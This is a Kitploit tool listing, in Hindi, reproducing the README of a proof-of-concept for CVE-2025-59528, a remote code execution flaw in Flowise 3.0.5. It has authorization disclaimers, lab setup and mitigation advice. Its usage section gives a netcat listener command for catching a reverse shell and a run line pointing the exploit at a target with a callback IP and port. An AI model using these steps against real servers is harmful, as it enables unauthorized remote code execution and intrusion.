Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 का पोक | Kitploit
उपकरण/GitHubGitHub/sonnelon/cve-2025-59528-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 का पोक

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59528 PoC

पृथक प्रयोगशाला वातावरण में CVE-2025-59528 पर शोध करने के लिए प्रूफ ऑफ कॉन्सेप्ट।

[!WARNING] अस्वीकरण

यह प्रोजेक्ट पूर्णतः शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान, और उन प्रणालियों के परीक्षण के लिए है जिनके स्वामी आप हैं या जिनके परीक्षण हेतु आपके पास स्पष्ट प्राधिकरण है।

इस PoC का उपयोग तृतीय-पक्ष सर्वरों, सार्वजनिक सेवाओं, या बुनियादी ढांचे के विरुद्ध स्वामी की अनुमति के बिना न करें।

लेखक इस प्रोजेक्ट के दुरुपयोग से उत्पन्न किसी भी क्षति, डेटा हानि, सेवा व्यवधान, या कानूनी परिणामों के लिए उत्तरदायी नहीं है।

विवरण

यह PoC CVE-2025-59528 के संभावित प्रभाव को प्रदर्शित करता है, जो Flowise में उपयोगकर्ता-नियंत्रित mcpServerConfig के प्रसंस्करण से संबंधित एक भेद्यता है।

कुछ शर्तों के अंतर्गत, यह भेद्यता हमलावर को सर्वर-पक्ष संदर्भ में मनमाना JavaScript कोड निष्पादित करने की अनुमति दे सकती है।

प्रभावित संस्करण

  • Flowise 3.0.5

फिक्स्ड संस्करण

  • Flowise 3.0.6+

परीक्षण से पहले हमेशा लक्षित इंस्टॉलेशन के सटीक संस्करण को सत्यापित करें।

आवश्यकताएँ

  • Python 3
  • requests
  • एक स्थानीय या पृथक Flowise परीक्षण इंस्टेंस
  • आवश्यक अनुमतियों वाला एक अधिकृत खाता
  • Python निर्भरता स्थापित करें:

    root@kitploit:~
    pip install requests
    

    उपयोग

    शेल प्राप्त करने के लिए netcat चलाएँ:

    root@kitploit:~
    nc -lvnp <YOUR_PORT>
    

    PoC को इस प्रकार चलाएँ:

    root@kitploit:~
    python3 poc.py \
        -t http://TARGET:PORT \
        -o api_key \
        -i CALLBACK_IP \
        -p CALLBACK_PORT
    

    तर्क

    तर्कविवरण
    -t, --targetFlowise परीक्षण इंस्टेंस का URL
    -o, --api_keyAPI कुंजी
    -i, --ipपरीक्षण मशीन का IP पता
    -p, --portपरीक्षण वातावरण द्वारा उपयोग किया गया पोर्ट

    प्रयोगशाला सेटअप

    परीक्षण एक पृथक वर्चुअल या प्रयोगशाला नेटवर्क के भीतर किया जाना चाहिए।

    root@kitploit:~
    ┌──────────────────┐
    │    PoC Machine   │
    │                  │
    │    Python PoC    │
    └────────┬─────────┘
             │
             │ Isolated Network
             │
    ┌────────▼─────────┐
    │   Flowise 3.0.5  │
    │   Test Instance  │
    └──────────────────┘
    

    जानबूझकर भेद्य Flowise इंस्टेंस को सीधे सार्वजनिक इंटरनेट पर उजागर न करें।

    शमन

    यदि आप Flowise का प्रभावित संस्करण चला रहे हैं:

    1. Flowise को पैच किए गए संस्करण में अपग्रेड करें।
    2. प्रशासनिक API तक पहुँच प्रतिबंधित करें।
    3. अविश्वसनीय उपयोगकर्ताओं को भेद्य कार्यक्षमता तक पहुँचने के लिए आवश्यक अनुमतियाँ प्रदान करने से बचें।
    4. संदिग्ध अनुरोधों के लिए सर्वर लॉग की समीक्षा करें।
    5. अपग्रेड के बाद इंस्टॉलेशन का पुनः परीक्षण करें।

    संदर्भ

    • CVE: CVE-2025-59528
    • प्रभावित सॉफ़्टवेयर: Flowise
    • फिक्स्ड संस्करण: 3.0.6+

    कानूनी सूचना

    इस प्रोजेक्ट का उपयोग करके, आप स्वीकार करते हैं कि आप सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए पूर्णतः उत्तरदायी हैं।

    इस PoC का उपयोग केवल उन्हीं प्रणालियों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके लिए आपके पास सुरक्षा परीक्षण करने के लिए स्पष्ट प्राधिकरण है।

    टूल डाउनलोड करें